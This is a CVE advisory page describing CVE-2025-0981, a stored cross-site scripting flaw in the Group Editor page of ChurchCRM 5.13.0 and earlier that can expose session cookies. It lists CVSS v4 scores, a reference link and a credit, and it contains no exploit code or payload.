Stored Cross Site Scripting Vulnerability in ChurchCRM by ChurchCRM
CVE-2025-0981

8.4HIGH

Key Information:

Vendor

Churchcrm

Status
Churchcrm
Vendor
CVE Published:
18 February 2025

What is CVE-2025-0981?

A vulnerability in ChurchCRM versions 5.13.0 and earlier allows attackers to exploit a Stored Cross Site Scripting (XSS) flaw in the Group Editor page. By injecting malicious JavaScript, an attacker can capture the session cookie of authenticated users. This access enables session hijacking, allowing unauthorized users to impersonate legitimate users and potentially gain access to sensitive information. It is crucial for users of affected versions to apply security patches to mitigate these risks.

Affected Version(s)

ChurchCRM ChurchCRM 5.13.0 and prior

References

https://github.com/ChurchCRM/CRM/issues/7245

CVSS V4

Score:
8.4
Severity:
HIGH
Confidentiality:
High
Integrity:
Low
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
None
Privileges Required:
Undefined
User Interaction:
Unknown

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Michael McInerney
.
CVE-2025-0981 : Stored Cross Site Scripting Vulnerability in ChurchCRM by ChurchCRM